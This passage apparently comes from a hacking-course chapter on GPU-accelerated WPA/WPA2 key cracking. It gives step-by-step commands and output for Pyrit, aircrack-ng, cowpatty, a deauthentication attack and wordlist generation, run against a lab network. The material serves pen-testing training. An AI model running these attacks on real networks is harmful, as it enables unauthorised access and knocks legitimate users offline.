Pyrit is a WPA-PSK and WPA2-PSK cracker available for free under
the GNU General Public License, and currently is the most efficient
tool to exploit multicore platforms and the following technologies:
ATI-Stream, NVIDIA CUDA, OpenCL and VIA Padlock. Within
the scope of this work, we focus on CUDA.
Navigate to cuda-ext:
You need to unpack two archive files, Pyrit-0.2.3.tar.gz and

CPyrit-CUDA-0.2.3.tar.gz
[root@localhost cuda-ext]# tar xfz Pyrit-0.2.3.tar.gz

[root@localhost cuda-ext]# tar xfz CPyrit-CUDA-0.2.3.tar.gz
Move to the Pyrit directory:
[root@localhost cuda-ext]# cd Pyrit-0.2.3
Start building the sources and installing the program:
[root@localhost Pyrit-0.2.3]# python setup.py build install
Now, navigate to the directory that contains libraries implementing

the CUDA capabilities:
[root@localhost Pyrit-0.2.3]# cd ../CPyrit-CUDA-0.2.3
The last step is to build and install the application:
[root@localhost CPyrit-CUDA-0.2.3]# python setup.py build install
Testing the tool

To see if CUDA is successfully enabled, use the pyrit list _ cores
command to print the available hardware.
[root@localhost CPyrit-CUDA-0.2.3]# pyrit list_cores
...
The ESSID-blobspace seems to be empty; you should create an ESSID...

The following cores seem available...
#1: ‘CUDA-Device #1 ‘GeForce 9600M GT’’
#2: ‘CPU-Core (SSE2)’
#1 is the GeForce 9600M GT video card. This means that

a CUDA-supported device is available in the system for your use.
Let’s see the expected performance of the hardware:

[root@localhost CPyrit-CUDA-0.2.3]# pyrit benchmark
...
Running benchmark for at least 60 seconds...
#1: ‘CUDA-Device #1 ‘GeForce 9600M GT’’: 1472.8 PMKs/s (Occ. 99.4%; RTT 2.9)
#2: ‘CPU-Core (SSE2)’: 417.1 PMKs/s (Occ. 96.4%; RTT 2.9)
Benchmark done. 1889 PMKs/s total.
1472 PMKs/s on this mobile video card is not striking but still it’s
a triple improvement in performance compared to the results of
the Core 2 Duo 2 GHz CPU.
Let’s see this GPU benchmark in context.

Pyrit performance – Computed PMK per second
GeForce 295 GTX (CUDA)
Radeon 4870 (Stream)
Radeon 4850 (Stream)
GeForce 8800 GTS (CUDA)
Core i7 950 4x3.0GHz (SSE2)
GeForce 9600 GT (CUDA)
GeForce 8800M GT (CUDA)

PMK
0 5000 10000 15000 20000
Useful options and commands (for the 0.2.3 version)

The general syntax of the tool:
pyrit [options] command
Options
-e
Specifies the ESSID. If omitted, all ESSIDs in the database will be

referred.
-f
Depending on the exact command, this option specifies

a filename to read from or write to. The special filename typed
after this option (-) can be used for standard output stream
(stdout) or standard input stream (stdin).
Commands
batch
Translates all database passwords into their PMKs and writes
them to the database. Add the -e option to restrict this command
to a single ESSID. All ESSIDs in the database will be processed if
it is skipped.
Example:
pyrit -e NETGEAR batch
benchmark
Determines the peak-performance of the available hardware by
computing dummy-results.
Example:
pyrit benchmark
create_essid
Adds a new ESSID given by the -e option to the database.
Example:
pyrit -e NETGEAR create_essid
delete_essid
Deletes an ESSID specified by the -e option.
Example:
pyrit -e NETGEAR delete_essid
eval
Counts all available passwords and the results for every ESSIDs
stored in the database.
Example:
pyrit eval
export_cowpatty
Writes the results for an ESSID specified by -e to a file specified
by the -f option in cowpatty format. Note that existing files will
be overwritten without a confirmation prompt.
Example:
pyrit -f NETGEAR.cow -e NETGEAR export_cowpatty
export_hashdb
Writes all results stored in the database to the airolib-ng

database given by the -f option. You can use the -e option to limit
the export to a specific ESSID.
Example:
pyrit -f NETGEAR.db -e NETGEAR export_hashdb
export_passwords
Writes all passwords stored in the database to a new file given
in -f. Note that existing files will be overwritten without
a confirmation prompt.
Example:
pyrit -f myword.txt.gz export_passwords
import_passwords
Reads passwords from the file given in -f to the database.
The passwords may contain all characters except for the newline
character \n. The passwords that cannot be used to crack
WPA-/WPA2-PSK will be omitted. Pyrit will only import
passwords and ignore duplicates.
Example:
pyrit -f dirty_words.txt import_passwords
list_cores
Prints the available hardware.
Example:
pyrit list_cores
list_essids
Prints all available ESSIDs stored in the database. The function
is faster than eval when you do not need to know the number of
computed results for each respective ESSID.
Example:
pyrit list_essids
passthrough
Reads passwords from a file given in -f and computes their
PMKs for an ESSID given in -e. The results are printed directly
to the output file in cowpatty format and are not stored in the
database.
Example:
pyrit -f dirty_words.txt.gz -e NETGEAR passthrough |
cowpatty -d - -r wpatestcapture.cap -s NETGEAR
selftest
Runs a 60-second selftest to check the hardware printed
by list _ cores. The command may detect broken hardware.
Example:
pyrit selftest
verify
Randomly selects 10% of the results stored in the database and
recomputes them to verify their accuracy. The option can be used
in the case of a suspected hardware corruption.
Example:
pyrit -e NETGEAR verify
Aircrack-ng
An already familiar name, aircrack-ng is a suite of utilities designed
to execute a variety of attacks on wireless networks, from packet
capture and injection to WEP and WPA key cracking.
Below is a short listing of the suite components:
aircrack-ng: cracks WEP (brute force) and WPA keys (dictionary

attack) .
airdecap-ng: decrypts packet capture files using a key.
airmon-ng: enables monitor mode on wireless network interfaces.
aireplay-ng: allows packet injection.
airodump-ng: a sniffer capturing network packets to PCAP and

IVS files.
airolib-ng: a database to store and manage ESSID and password

lists.
packetforge-ng: generates encrypted packets to inject.
airbase-ng: enables attacks against clients by setting a rogue AP

to capture a password.
airdecloak-ng: removes WEP Cloaking from PCAP files with

saved captures.
airdriver-ng: manages wireless interface drivers.
airserv-ng: enables remote access to a wireless interface.
buddy-ng: an auxiliary server for easside-ng, runs on a remote

host.
easside-ng: communicates to an AP without knowing the WEP

key.
tkiptun-ng: mounts WPA/TKIP attacks.
wesside-ng: an auto-magic tool that recovers WEP keys.
Installation
The following steps demonstrate how to install the latest stable
aircrack-ng package version with CUDA and sqlite support.
Move to the directory containing our extensions.
To compile aircrack-ng with sqlite support, you need first to

unpack the sqlite-amalgamation-3.6.20.tar.gz archive.
[root@localhost cuda-ext]# tar xfz sqlite-amalgamation-3.6.20.tar.gz
Move to the unpacked directory:
[root@localhost cuda-ext]# cd sqlite-3.6.20/
Configure sqlite before you compile it.
[root@localhost sqlite-3.6.20]# ./configure --prefix=/usr
Compile the sources and install the library in the system.
[root@localhost sqlite-3.6.20]# make

[root@localhost sqlite-3.6.20]# make install
Next, unpack the aircrack-ng archive.
[root@localhost cuda-ext]# tar xfz aircrack-ng-cuda.tar.gz

[root@localhost cuda-ext]# cd aircrack-ng-cuda
Compile the sources with these parameters: CUDA=true,

sqlite=true, unstable=true. Specify CUDA installation path as
usr/local/cuda.
[root@localhost aircrack-ng-cuda]# make CUDA=true sqlite=true unstable=true

CUDA_INSTALL_PATH=/usr/local/cuda
Finalize the installation:
[root@localhost aircrack-ng-cuda]# make unstable=true install
Aircrack-ng is now ready to use.

Usage: aircrack [options] <.cap / .ivs files>
-a <amode>: selects attack type (1/WEP, 2/WPA-PSK)
-e <essid>: network ESSID
-b <bbid>: access point MAC address
-p <nbcpu>: number of CPUs to be used (default: all)
-q: enables quiet mode (no status displayed)
-C <macs>: merges given APs to a virtual one
-l <file>: saves a key to a file
WEP cracking options:

-c: restricts the search space to alphanumeric characters only
-t: restricts the search space to BCD characters
-h: restricts the search space to numeric keys used in Fritz!BOXes

-d <mask>: uses masking of the key (A1:XX:CF:YY)
-m <maddr>: filters useful packets by a MAC address
-n <nbits>: specifies the length of the key (WEP:

64/128/152/256/512)
-i <index>: specifies a WEP key index (1–4); the default behavior

is to ignore the key index
-f <fudge>: brute force fudge factor, by default set to 2
-k <korek>: disables one of the attacks (17 are available)
-x or -x0: disables brute-forcing the last keybytes
-x1: enables brute-forcing the last keybytes (default)
-x2: enables brute-forcing the last two keybytes
-X: disables brute force multithreading
-y: experimental single brute force attack
-K: only uses the old pre-PTW KoreK attack
-s: displays the ASCII version of the key during cracking
-M <num>: specifies the maximum number of IVs to use
-D: WEP decloak mode, skips broken keystreams
-P <num>: the PTW debug; 1: disables Klein, 2: PTW
-1: runs in oneshot mode to crack keys using PTW
WEP and WPA-PSK cracking options:

-w <words>: path to the dictionary
-r <DB>: path to the airolib-ng database (cannot be used with -w)
--help: prints help information
GPU tweaking in Linux

It is possible to unlock even more of your video card potential and
overclock its GPU and memory to increase performance and speed.
However, without sufficient cooling, overclocking can endanger
the chip due to higher heat generation. The common symptoms of
overheating are unstable video card performance, visual artifacts or
crashing, and in the worst case scenario overclocking a card beyond
its capabilities destroys it. Keep this at the back of your mind if you
opt to tweak the GPU.
There are two ways of re-configuring GPU hardware settings. The

first is to use the nvidia-settings application. Let’s see if xorg.conf
contains appropriate settings.
[root@localhost nvclock0.8b4]# cat /etc/X11/xorg.conf | grep -icoolbits
If the output includes the Option “Coolbits” “1” line, the

configuration is fine and you can run nvidia-settings. If not, edit
the xorg.conf file, for example using this command:
[root@localhost nvclock0.8b4]# mcedit /etc/X11/xorg.conf
Find a section similar to this one in the file (F7):
Section „Device”
Identifier „Videocard1”
Driver „nvidia”
VendorName „NVIDIA Corporation”
BoardName „GeForce 9600M GT”
BusID „PCI:3:0:0”
Screen 1
Option „AddARGBGLXVisuals” „true”
Option „Coolbits” „1”

Option „RenderAccel” „true”
EndSection
Add the Option “Coolbits” “1” line exactly like in the example above
and save the file using F2. Press Esc to quit the editor. After the
changes are made, you need to restart the X server.
Now, open video card settings using this command:
[root@localhost nvclock0.8b4]# nvidia-settings
You can now arbitrarily change GPU and Memory clock rates.
The other option is to use nvclock. First, you need to compile and
install the utility in your system.
Installing nvclock
Move to the cuda-ext directory containing the archive. Unpack it.

[root@localhost cuda-ext]# tar xfz nvclock0.8b4.tar.gz
Now, move to the unpacked files directory and run configuration

before installation.
[root@localhost cuda-ext]# cd nvclock0.8b4

[root@localhost nvclock0.8b4]# ./configure
Compile the nvclock source files.
[root@localhost nvclock0.8b4]# make
Install the program.
[root@localhost nvclock0.8b4]# make install

Use nvclock to see your hardware information.
[root@localhost nvclock0.8b4]# nvclock -i

-- General info --
Card: nVidia Geforce 9600M GT
Architecture: G96 A1
PCI id: 0x649
GPU clock: 182.248 MHz
Bustype: PCI-Express
-- Shader info --
Clock: 675.000 MHz
Stream units: 32 (00011b)
ROP units: 8 (00000011b)
-- Memory info --
Amount: 512 MB
Type: 128 bit DDR2
Clock: 799.200 MHz
-- PCI-Express info --
Current Rate: 1X
Maximum rate: 16X
-- Smartdimmer info --
Backlight level: 0%
-- Sensor info --
Sensor: GPU Internal Sensor
GPU temperature: 59C
-- VideoBios information --
Version: 62.94.1a.00.19
Signon message: G96 E566 NB9P-GS VGA BIOS
Performance level 0: gpu 275MHz/shader 550MHz/memory 250MHz/0.89V/100%
VID mask: 3
Voltage level 0: 0.89V, VID: 1
Voltage level 1: 1.05V, VID: 0
[root@localhost nvclock0.8b4]# nvclock -s

Card: nVidia Geforce 9600M GT
Card number: 1
Mode GPU Clock Memory Clock
Coolbits 2D: 169.000 MHz 100.000 MHz
Coolbits 3D: 500.000 MHz 400.000 MHz

Current: 182.248 MHz 799.200 MHz
To change GPU and memory clock rates, use this command

template:
[root@localhost nvclock0.8b4]# nvclock -b coolbits -n GPU_clock_speed

memory_speed
If you want to restore the original speeds, use this syntax:
[root@localhost nvclock0.8b4]# nvclock -b coolbits -f

Usage: nvclock [options]
Tweaking options:
-b, --backend backend: possible values are coolbits/coolbits2/

coolbits3/lowlevel (NV3X/NV4X/NV5X)
-m, --memclk speed: memory speed in MHz
-n, --nvclk speed: GPU speed in MHz
-r, --reset: resets to original clockspeeds
-s, --speeds: shows current speeds in MHz
-d, --debug: enables/disables debug info
Hardware options:
-c, --card number: number of the card to overclock
-D, --Debug: prints detailed debugging information
-f, --force: forces support of disabled hardware

-F, --fanspeed speed: adjusts the fanspeed; takes a value from

10 to 100 or ‘auto’
-P, --punit mask: unlocks extra pixel pipelines (only in NV4X)
-S, --smartdimmer level: adjusts the brightness of the backlight;

takes a value from 15 and 100, or for example +10/-10
-T, --temperature: prints the GPU temperature
-i, --info: detailed card information

CUDA in action: WLAN attacks

With the development platform fully configured, you can start
using applications that unlock the hidden video card potential with
CUDA. We are going to launch a series of pen-test attacks targeting
WPA and see how these spick-and-span solutions and tools affect
key cracking speed.
Test platform
All attacks presented below have been run on a midrange laptop
with the following specs:
CPU: Intel Core 2 Duo P7350 – 2 GHz
Memory: 3 GB, DDR2-800
Video card: NVIDIA GeForce 9600M GT - 512 MB, DDR2
Operating system:
Training Operating System v2.0

+ cuda-ext extension
Test files
The cuda-ext.tar.bz2 archive contains (in the hackme directory)
samples that have been used in the attacks below. These samples
are a great opportunity to learn and test your skills in a practical
environment.
List of files:
dict _ hashes.air: a processed aircrack-ng hash table
dict _ hashes.cow: a processed cowpatty hash table

CUDA in action: WLAN attacks 125
dict.txt: a dictionary file (password list)
essid.txt: an ESSID (network ID) list
wpa-hackme-01.cap: a packet and four-way handshake capture file
wpa-hackme-02.cap: a packed and four-way handshake capture

file
Move to the directory containing the test files:
[root@localhost root]# cd ~/cuda-ext/hackme
Preparing for an attack

Get your attack ready with the help of the aircrack-ng suite
applications. The first thing to do is to enable monitor mode on
a card to make it capture all network traffic.
[root@localhost hackme]# iwconfig wlan1 mode monitor
The parameters:
mode monitor: sets the operating mode to monitor
wlan1: the wireless network interface name (run iwconfig without

any arguments to see available interfaces)
The next step is to sniff on wireless traffic. We’ll be using the

airodump-ng tool for the purpose. All captures will be written to the
‘capture’ file:
[root@localhost hackme]# airodump-ng –wcapture wlan1
The parameters:
-w: writes to a file
capture: a filename with the ‘capture’ prefix
CH 10 ][ Elapsed: 2 mins ][ 2014-03-10 12:32
00:##:A1:##:##:## -58 758 3276 23 3 54 WPA CCMP PSK hackingschool

00:23:54:##:##:## -92 19 0 0 11 54 WPA2 CCMP PSK linksys
00:19:E0:##:##:28 -93 2 0 0 6 54 . WPA2 CCMP PSK default
00:0E:##:##:09:## -1 0 1 0 158 -1 WEP WEP <length: 0>
00:0E:##:##:##:## -1 0 0 0 118 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:08:##:##:##:## 00:##:##:##:##:## -26 54 -36 2424 3358

00:0E:##:##:##:## 00:##:FF:##:##:## -91 0-1 0 13 student
00:0E:##:##:##:## 00:0E:##:##:##:## -90 0-2 0 12
Aircrack-ng has been discussed in depth earlier in the lecture and

so we are not going to rehearse it again. The network selected for the
attack has the identifier name (ESSID) hackingschool. This is the
network to crack into.
An essential ingredient to pull off the assault is a captured four-way

handshake (the four-level key negotiation messages). As you know
by now, two ways to collect it exist.
The first, and the slower of the two, requires an attacker to wait for
a user to connect with a wireless network.
The other, much more expeditious method involves

deauthentication. For an exhaustive look at this attack, go back
to the earlier chapters. The deauthentication attack allows you to

disconnect a user and instantly capture the user’s negotiation
packets during re-authentication.
The mode we pick is obviously the faster one. To perform

deauthentication, we’ll use another aircrack-ng tool, aireplay-ng.
Remember that airodump-ng needs to be running to capture
the packets (for example on a different console).
[root@localhost hackme]# aireplay-ng -0 10 -aaa:bb:cc:dd:ee:ff -c

ff:ff:ff:ff:ff:ff wlan1
Where:
-0: selects attack type (deauth)
10: number of deauthentication packets to send
-a aa:bb:cc:dd:ee:ff: access point MAC address
-c ff:ff:ff:ff:ff:ff: MAC address of the client to

deauthenticate (if this is omitted, all users on the network will be
deauthenticated)
-wlan1: the wireless network interface name
[root@localhost hackme]# aireplay-ng -0 10 -aaa:bb:cc:dd:ee:ff -c

ff:ff:ff:ff:ff:ff wlan1
12:38:04 Waiting for beacon frame (BSSID: aa:bb:cc:dd:ee:ff) on channel 3
12:38:04 Sending 64 directed DeAuth. STMAC: [ff:ff:ff:ff:ff:ff] [67|66 ACKs]
12:38:08 Sending 64 directed DeAuth. STMAC: [ff:ff:ff:ff:ff:ff] [ 0|64 ACKs]
Wait for the client to reconnect to the AP. Use aircrack-ng to check if
you have successfully captured the four-way handshake:
[root@localhost hackme]# aircrack-ng wpa-hackme-1.cap
Where:
wpa-hackme-01.cap: the capture file
!
Note. The example uses a capture file found in the test resources.
If you have your own captures to process, adjust the filename
accordingly.
NOTE [root@localhost hackme]# aircrack-ng wpa-hackme-01.cap
Opening wpa-hackme-01.cap
Read 17068 packets.
# BSSID ESSID Encryption
1 00:1A:70:97:5F:38 hackingschool WPA (1 handshake)

2 00:18:4D:82:D6:24 ANDREW WPA (0 handshake)
3 02:18:9B:71:5D:58 No data - WEP or WPA
4 00:18:9B:71:5D:57 wifi_1 None (0.0.0.0)
5 00:22:6B:EA:FC:7A wifi_2 WPA (0 handshake)
6 00:1B:2F:5D:94:B8 WPA (0 handshake)
Index number of target network ? ^C
As you see, 1 handshake has been captured. You can now move to
the next stages in cracking the test network’s key.
Pyrit: Hash table generation modes

The pyrit utility operates in either of the two modes:
1. Passthrough mode: Pyrit computes the PMK for a given

ESSID and a submitted wordlist (dictionary) on the fly and
the output is piped to cowpatty in the tool’s format. This
solution’s weak spot is not storing the PMKs in the database.
This dramatically lowers the effectiveness if you need to use
the created hash table more than once, but passthrough can be
recommended when you don’t have enough space on the hard
disk to store the database, for example when using a LiveCD.
2. Batch processing mode: consistent with batch workload

pattern, an application processes all data (or sets) before it is
used by the proper program. Pyrit executes operations on an
entire wordlist and ESSID list and writes the computed PMKs
to the database for later use. Even if building a hash table in
batch mode is more laborious to complete, the key cracking
speed increase you may observe makes it worthwhile. Pyrit
is able to write processed data in a format readable both by
cowpatty and aircrack-ng. Let’s now see what this process
looks like when put to practice.
The following walks you through both modes.
Passthrough mode
As described, Pyrit can compute PMKs on the fly and pass them as
input to cowpatty, which verifies the correctness of the hashes.
[root@localhost hackme]# pyrit -e hackingschool -f dict.txt passthrough |

cowpatty -r wpa-hackme-01.cap -s hackingschool -d -
Where:
-e hackingschool: network ESSID
-f dict.txt: dictionary file (password list)
passthrough: passthrough mode, the results are piped without

being stored
-r wpa-hackme-01.cap: packet capture file
-s hackingschool: network ESSID
-d -: computed hashes are taken from stdin (-)
Collected all necessary data to mount crack against WPA2/PSK passphrase.

Using STDIN for hashfile contents.
key no. 10000: R-Kansas
key no. 20000: bereaved
key no. 30000: cephalad
.............................
.............................
.............................
key no. 450000: FICHECK/MFICHECK

key no. 460000: proteroglyphous
The PSK is „hackingschoolrulez”.
The key has been found. The achieved rate is 1910 passwords per
second, and the key is recovered in about 4 minutes in a search space
of more than 450 thousand passphrases.
Just to compare, let’s see how cowpatty fares in a standard dictionary

attack without having the advantage of a precomputed hash table:
[root@localhost hackme]# cowpatty -r wpa-hackme-01.cap -s hackingschool -f dict.txt
Where:
-r wpa-hackme-01.cap: packet capture file
-f dict.txt: dictionary file
Collected all necessary data to mount crack against WPA/PSK passphrase.

key no. 10000: R-Kansas
key no. 20000: bereaved
key no. 30000: cephalad
.............................
.............................
.............................
key no. 450000: FICHECK/MFICHECK
key no. 460000: proteroglyphous

The search yields a success again, but there is an enormous gap

in cracking speed between the two approaches. 87 passwords
per second is averaged without the use of hash tables, a 22-fold
performance decrease compared with the previous rate of 1910 pps.
Batch processing mode

We are going to use two hash table generators, Pyrit and the
aircrack-ng suite. Let’s start with Pyrit.
In the first step, create a new ESSID.
[root@localhost hackme]# pyrit -e some_essid create_essid

Where:
-e some _ essid: specifies the ESSID to add to the pyrit database
create _ essid: command that creates a new ESSID in the

database
[root@localhost hackme]# pyrit -e hackingschool create_essid
...
Created ESSID ‘hackingschool’
If you want to see the currently stored ESSIDs in the database, you
can run this command:
[root@localhost hackme]# pyrit list_essids
As the database now contains the relevant ESSID, let’s import

the wordlist in the dictionary file to the database:
[root@localhost hackme]# pyrit -e hackingschool -f dict.txt import_passwords
The parameters:
-f dictionary _ file.txt: specifies the path to the dictionary file
import _ passwords: command that imports passwords from the

dictionary
[root@localhost hackme]# pyrit -e hackingschool -f dict.txt import_passwords
...
Importing from ‘dict.txt’

869229 lines read. Flushing buffers...
All done.
With all needed data loaded, you can start batch processing and
generate PMKs for the database. This can take some time depending
on the size of the used dictionary, but with CUDA, processing
should be even up to 100 times faster than the standard CPU
processing.
[root@localhost hackme]# pyrit -e hackingschool batch
...
Working on ESSID ‘hackingschool’

Computed 451930 PMKs so far; 1861 PMKs per second; 10739 passwords buffered.
Stopped reading workunits...
Computed 472163 PMKs so far; 1886 PMKs per second; 0 passwords buffered.d...
All done. 1893.88 PMKs/s total.
#1: ‘CUDA-Device #1 ‘GeForce 9600M GT’’: 1382.6 PMKs/s (Occ. 99.7%; RTT 3.1)
#2: ‘CPU-Core (SSE2)’: 519.2 PMKs/s (Occ. 99.3%; RTT 3.0)
Batchprocessing done.
The data has been processed in a batch, and you can export the
computed PMK database both to cowpatty and aircrack-ng formats.
Both will be looked at; we will also showcase the two crackers.
Export to a cowpatty format

Write the data to a format that can be read by cowpatty.
[root@localhost hackme]# pyrit -e hackingschool -f dict_hash.cowpatty

export_cowpatty
The parameters:
-f dict _ hash.cowpatty: output cowpatty hash file
export _ cowpatty: command that exports hashes
[root@localhost hackme]# pyrit -e hackingschool -f dict_hash.cowpatty

export_cowpatty
...
Exporting to ‘dict_hash.cowpatty’...
473986 entries written. All done.
You can now begin to crack the key using the exported table.
[root@localhost hackme]# cowpatty -d dict_hash.cowpatty -r wpa-hackme-01.cap

-s hackingschool
The parameters:
-d dict _ hash.cowpatty: reads the computed hash file
-r wpa-hackme-01.cap: reads the packet capture file
[root@localhost hackme]# cowpatty -d dict_hash.cowpatty -r wpa-hackme-01.cap

-s hackingschool
Collected all necessary data to mount crack against WPA2/PSK passphrase.

key no. 10000: fLsetgid

key no. 20000: procreatrix
.........................................
.........................................
.........................................
key no. 430000: commentsclo
key no. 440000: niterider
Utilizing the hash table computed in Pyrit results in a successful

crack in under 4 seconds, a striking feat. If your intention is to pen-
test the security of WLANs that have identical, common ESSIDs,
it’s a good idea to use pre-computed tables stored on a hard drive.
Cracking time in that case is reduced by 60 times or more.
Export to an aircrack-ng format

Now, let’s explore the export process of a hash table generated in
Pyrit to an aircrack-ng format.
[root@localhost hackme]# pyrit -e hackingschool -f dict_hashes.air export_hashdb
The parameters:
-f dict _ hashes.air: output hash table file
export _ hashdb: command that exports the database to

aircrack-ng format
[root@localhost hackme]# pyrit -e hackingschool -f dict_hashes.air export_hashdb

...
The database ‘dict_hashes.air’ seems to be uninitialized. Trying to create

default table-layout... Tables created...
Writing passwords...
Wrote 473986 lines...

Writing ESSIDs and results...
Writing ‘hackingschool’...
Wrote 473986 lines...
All done.
Let’s see what aircrack-ng can do with the exported table.
[root@localhost hackme]# aircrack-ng -r dict_hashes.air -e hackingschool

wpa-hackme-01.cap
Read 17068 packets.
Aircrack-ng 1.0
[00:00:03] 158578 keys tested (49765.98 k/s)
KEY FOUND! [ hackingschoolrulez ]
Master Key : D9 0D D5 39 05 27 10 23 DA D0 D9 1F B9 A6 34 74
1B 2C 01 81 F5 9F 3A E4 42 B4 01 EA 72 2F F0 07
Transient Key : 1C C0 26 E8 25 AA 23 2A D8 30 97 AD 1E 23 85 16
1F B3 1B F4 98 4E B4 2A 25 E4 B3 B3 75 24 5A B3
3F A1 CC D7 50 A5 55 9F 23 FD E2 FE 20 73 8A 0E
51 E8 E7 24 AD D2 85 6D D6 84 D0 4F 4E 91 EC 1F
EAPOL HMAC : 7D E8 8F 30 8F 5C 31 2C 2D D9 A4 28 46 FE DC 7F
Quitting aircrack-ng...
The program recovers the key in 3 seconds flat from a pool of

150 thousand keys. The testing performance is slower than in
cowpatty, however likely due to some differences in the operation
of the algorithm that governs key testing order WPA cracking was
quicker in this case.
Airolib-ng
The latest utilities in the aircrack-ng package offer a hash generation
capability similar to Pyrit’s, and consequently if you do not want to
use the Pyrit batch processing, you can instead turn to airolib-ng
for the feature.
Below is a run-through on how to use airolib-ng to compute hashes

and save them to a database to be used by aircrack-ng.
Import a password list to the database.
[root@localhost hackme]# airolib-ng database --import passwd dict.txt
The parameters:
database: database name
--import passwd: command that imports passwords from a file
dict.txt: dictionary file (password list)
[root@localhost hackme]# airolib-ng database --import passwd dict.txt

Database <database> does not already exist, creating it...
Database <database> sucessfully created
Reading file...
Writing...es read, 395241 invalid lines ignored.
Done.
Now, import an ESSID list from a file called essid.txt to the database:
[root@localhost hackme]# airolib-ng database --import essid essid.txt
The parameters:
--import essid: command that imports ESSIDs from a file
essid.txt: ESSID list file
[root@localhost hackme]# airolib-ng database --import essid essid.txt

Reading file...
Writing...
Done.
To determine if the database is really updated, use this syntax:
[root@localhost hackme]# airolib-ng database --stats
The parameters:
--stats: command that prints database statistics
[root@localhost hackme]# airolib-ng database --stats

There are 1 ESSIDs and 473986 passwords in the database. 0 out of 473986
possible combinations have been computed (0%).
ESSID Priority Done

hackingschool 64 0.0
Everything proceeds as expected, and you can carry on.
Now, process the data into a hash table necessary to crack the key.
[root@localhost hackme]# airolib-ng database --batch
The parameters:
--batch: command that computes hashes for the data stored in

the database
[root@localhost hackme]# airolib-ng database --batch

Computed 25000 PMK in 146 seconds (171 PMK/s, 225000 in buffer). ^C
We decided to stop batch processing before it was finalized. The

hash computing speed is very low at just 171 PMK/s. This means that
45 minutes would have been needed to compute the entire database,
while Pyrit offers a performance of 1800 PMK/s. This disparity
speaks volumes and clearly suggests airolib-ng is not recommended

for hash table generation due to inadequate speed.
The attacks stop here. However, if you failed to find the key, you
could use bigger and more exhaustive dictionaries for the task.
Read below for a benchmark exhibiting the performance of the

methods we went through.
Benchmark analysis
Key cracking
Tool Hash computing mode Elapsed Performance
time [s] [PMK/s]
cowpatty No precomputed hashes 5354,5 86,87
(dictionary file)
Aircrack-ng No precomputed hashes 564 863,08
(dictionary file)
cowpatty Passthrough 243,44 1910,69
cowpatty Batch processing 3,9 113825,61
Aircrack Batch processing 3 49765,98
The benchmark results speak for themselves. The standard

dictionary attack without computing hashes is inefficient even if
CUDA supports the key testing. Instead, it’s preferred to use tools
that build hash tables on the fly or read them from a database or file.
The choice of a suitable option should reflect whether you plan to
use the same hash table for a given ESSID again.
If a network to crack has a unique ESSID or if your storage space is

limited, select cowpatty with passthrough mode (Pyrit). The CUDA
support guarantees the attack will be efficient.
If you plan to crack (your) networks with the same ESSIDs, batch
processing is a better choice. The batch mode requires you to process
hash tables only once, without needing to repeat the time-intensive
procedure with each new attack. Cracking itself should be swift.
Still, it is up to you to choose the method.
Cowpatty might be faster in processing keys, however in the test

the total key cracking time was longer than for aircrack-ng. This is
likely due to the fact cowpatty runs through the entire key list in the
source file order, while aircrack-ng splits the hash table into smaller
sections and sorts them alphabetically. Evaluating the algorithms
employed in the tools is at your discretion as well. The speed of both
cowpatty and aircrack-ng algorithms largely depends on luck and
the probability theory.
Processing a dictionary into a hash table

Tool Time [s] Performance [PMK/s]
Pyrit ca. 250 1893,88
Airolib-ng ca. 2700 171
Right now, Pyrit is the fastest tool for generating hash tables from
password dictionaries and ESSID lists. It is more than ten times
faster than airolib-ng. While the performance of the utilities in
their upcoming versions is an unknown, Pyrit seems like the better
choice at this moment.
Dictionaries
Wordlist generator: Crunch

The dictionary attack may not exactly make the grade in all
its aspects, but it can be smooth and fast thanks to the CUDA
capabilities and a hash table. If you have some informed guesses
about key, for instance suspect only numeric characters are included
or that the key comprises only four lowercase characters, you
might undertake to obtain it making use of a custom wordlist, i.e.
combinations and permutation you create from a specified character
set.
Crunch is a popular utility that can do just that. You can send
the generated output to Pyrit or save it to a file.
Installation
The cuda-ext directory contains an archive with the tool. Unpack it.

[root@localhost cuda-ext]# tar xfz crunch-1.6.tar.gz
Compile and install it to use the tool.
[root@localhost cuda-ext]# cd crunch-1.6

[root@localhost crunch-1.6]# make
[root@localhost crunch-1.6]# make install

Usage:
crunch <min-len> <max-len> [charset] [-owordlist.txt]

[-t [FIXED]@@@@] [-s startblock] [-c number]
or,
crunch <min-len> <max-len> [-f <charset.lst> wordlist]

[-owordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]
min-len: the minimum word length to generate.
max-len: the maximum word length to generate.
[charset]: optional; if blank, crunch uses the default

abcdefghijklmnopqrstuvwxyz character set. Note: If you want
to add a space character, enclose your charset in quotation marks
(“”).
[-f <charset.lst> <charset-name>]: an alternative way of

specifying a character set. The option reads a charset from a file.
[-t [FIXED]@@@@]: optional; this option specifies a pattern, e.g.@@

hackingschool@@, where only the @ character will be changed
with other characters in the set.
[-s startblock]: defines the starting block in a string.
[-o wordlist.txt]: specifies the output file to write words to.

[-c number]: specifies the number of generated words.
Character sets specified in charset.lst:
numeric = [0123456789]
numeric-space = [0123456789 ]
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14 = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+
= ]
ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=
~`[]{}|\:;”’<>,.?/]
ualpha-numeric-all-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=
~`[]{}|\:;”’<>,.?/ ]
lalpha = [abcdefghijklmnopqrstuvwxyz]
lalpha-space = [abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space = [abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14 = [abcdefghijklmnopqrstuvwxyzĂ¤Ă¶ĂĽĂź0123456789!@#$%
^&*()-_+=”]
lalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzĂ¤Ă¶ĂĽĂź0
123456789!@#$%^&*()-_+=” ]
lalpha-numeric-all = [abcdefghijklmnopqrstuvwxyzĂ¤Ă¶ĂĽĂź
